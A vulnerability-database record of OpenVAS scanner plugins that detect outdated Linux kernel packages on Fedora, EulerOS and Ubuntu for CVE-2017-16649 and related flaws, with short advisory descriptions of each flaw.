ID OPENVAS:1361412562310873847 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_fedora_2017_905bb449bc_kernel_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $
#
# Fedora Update for kernel FEDORA-2017-905bb449bc
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.873847");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2017-12-04 18:48:29 +0530 (Mon, 04 Dec 2017)");
script_cve_id("CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16644", "CVE-2017-16647",
"CVE-2017-16994");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"qod_type", value:"package");
script_name("Fedora Update for kernel FEDORA-2017-905bb449bc");
script_tag(name:"summary", value:"The remote host is missing an update for the 'kernel'
package(s) announced via the referenced advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"affected", value:"kernel on Fedora 25");
script_tag(name:"solution", value:"Please install the updated package(s).");
script_xref(name:"FEDORA", value:"2017-905bb449bc");
script_xref(name:"URL", value:"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEB5GUQMAQ4GH3P5ICPAF7FUXP2J27MN");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC25");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "FC25")
{
if ((res = isrpmvuln(pkg:"kernel", rpm:"kernel~4.13.16~100.fc25", rls:"FC25")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310873847", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for kernel FEDORA-2017-905bb449bc", "description": "The remote host is missing an update for the ", "published": "2017-12-04T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873847", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017-905bb449bc", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEB5GUQMAQ4GH3P5ICPAF7FUXP2J27MN"], "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16644"], "lastseen": "2019-05-29T18:34:47", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310843824", "OPENVAS:1361412562310873817", "OPENVAS:1361412562310843500", "OPENVAS:1361412562311220191501", "OPENVAS:1361412562311220171319", "OPENVAS:1361412562310843492", "OPENVAS:1361412562311220171291", "OPENVAS:1361412562310843493", "OPENVAS:1361412562310874400", "OPENVAS:1361412562310874366"]}, {"type": "fedora", "idList": ["FEDORA:25BDD6190ECF", "FEDORA:E6F08605DCE7", "FEDORA:4832F6079717", "FEDORA:74245604D4DA", "FEDORA:1CF5E61A25A8", "FEDORA:1EFCC607D641", "FEDORA:D668A604CC02", "FEDORA:AB52460321C9", "FEDORA:08D3760E6566", "FEDORA:DF5176048167"]}, {"type": "cve", "idList": ["CVE-2017-16650", "CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16644", "CVE-2017-16647"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1501.NASL", "UBUNTU_USN-3617-1.NASL", "UBUNTU_USN-3617-2.NASL", "FEDORA_2017-905BB449BC.NASL", "FEDORA_2017-F9F3D80442.NASL", "UBUNTU_USN-3617-3.NASL", "FEDORA_2017-92A0AE09AA.NASL", "EULEROS_SA-2017-1291.NASL", "EULEROS_SA-2017-1319.NASL", "ALA_ALAS-2017-937.NASL"]}, {"type": "seebug", "idList": ["SSV:96915"]}, {"type": "amazon", "idList": ["ALAS-2017-937"]}, {"type": "zdt", "idList": ["1337DAY-ID-30016", "1337DAY-ID-30015"]}, {"type": "exploitdb", "idList": ["EDB-ID:44304", "EDB-ID:44303"]}, {"type": "ubuntu", "idList": ["USN-3617-1", "USN-3617-3", "USN-3822-2", "USN-3619-2", "USN-3619-1", "USN-3617-2", "USN-3822-1"]}, {"type": "redhat", "idList": ["RHSA-2018:0502"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3210-1", "SUSE-SU-2018:0785-1", "SUSE-SU-2017:3249-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4108", "ELSA-2019-4644", "ELSA-2020-5837", "ELSA-2018-4089", "ELSA-2017-3651", "ELSA-2018-4088"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC"]}], "modified": "2019-05-29T18:34:47", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-05-29T18:34:47", "rev": 2}, "vulnersScore": 7.7}, "pluginID": "1361412562310873847", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_905bb449bc_kernel_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-905bb449bc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873847\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:48:29 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16644\", \"CVE-2017-16647\",\n \"CVE-2017-16994\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-905bb449bc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-905bb449bc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEB5GUQMAQ4GH3P5ICPAF7FUXP2J27MN\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~100.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"openvas": [{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16644"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-04T00:00:00", "id": "OPENVAS:1361412562310873817", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873817", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-92a0ae09aa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_92a0ae09aa_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-92a0ae09aa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873817\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:47:52 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16644\", \"CVE-2017-16647\",\n \"CVE-2017-16994\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-92a0ae09aa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-92a0ae09aa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSM7QJRIA5LBSE4QU5MBVROAQBX4KL7K\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~300.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:33:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-1000410", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644", "CVE-2017-16645"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171319", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171319", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1319)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1319\");\n script_version(\"2020-01-23T11:06:56+0000\");\n script_cve_id(\"CVE-2017-1000410\", \"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16645\", \"CVE-2017-16649\", \"CVE-2017-16650\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:06:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:06:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1319)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1319\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1319\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1319 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the processing of incoming L2CAP bluetooth commands. Uninitialized stack variables can be sent to an attacker leaking data in kernel address space.(CVE-2017-1000410)\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16650)\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16649)\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16645)\n\nThe hdpvr_probe function in drivers/media/usb/hdpvr/hdpvr-core.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (improper error handling and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16644)\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16643)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310843500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843500", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3617-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3617_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-raspi2 USN-3617-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843500\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-06 09:58:11 +0200 (Fri, 06 Apr 2018)\");\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\",\n \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\",\n \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\",\n \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\",\n \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\",\n \"CVE-2018-5344\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3617-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of\n the Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-0861) It was\n discovered that a use-after-free vulnerability existed in the network namespaces\n implementation in the Linux kernel. A local attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-15129) Andrey Konovalov discovered that the usbtest device driver in\n the Linux kernel did not properly validate endpoint metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16532) Andrey Konovalov discovered that the SoundGraph iMON USB driver\n in the Linux kernel did not properly validate device metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16537) Andrey Konovalov discovered that the IMS Passenger Control Unit\n USB driver in the Linux kernel did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16645) Andrey Konovalov discovered that the DiBcom\n DiB0700 USB DVB driver in the Linux kernel did not properly handle detach\n events. A physically proximate attacker could use this to cause a denial of\n service (system crash). (CVE-2017-16646) Andrey Konovalov discovered that the\n ASIX Ethernet USB driver in the Linux kernel did not properly handle suspend and\n resume events. A physically proximate attacker could use this to cause a denial\n of service (system crash). (CVE-2017-16647) Andrey Konovalov discovered that the\n CDC USB Ethernet driver did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16649) Andrey Konovalov discovered that the QMI WWAN\n USB driver did not properly validate device descriptors. A physically proximate\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16650) It was discovered that the HugeTLB component of the Linux\n kernel did not properly handle holes in hugetlb ranges. A local attacker could\n use this to expose sensitive information (kernel memory). (CVE-2017-16994) It\n was discovered that the netfilter component of the Linux did not properly\n restrict access to the connection tracking helpers list. A local attacker could\n use this to bypass intended access restrictions. (CVE-2017-17448) It was\n discovered that the netfilter passive O ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 17.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3617-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3617-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1016-raspi2\", ver:\"4.13.0-1016.17\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.13.0.1016.14\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-04-04T00:00:00", "id": "OPENVAS:1361412562310843492", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843492", "type": "openvas", "title": "Ubuntu Update for linux-gcp USN-3617-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3617_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-gcp USN-3617-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843492\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-04 08:30:51 +0200 (Wed, 04 Apr 2018)\");\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\",\n \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\",\n \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\",\n \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\",\n \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-gcp USN-3617-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-gcp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n 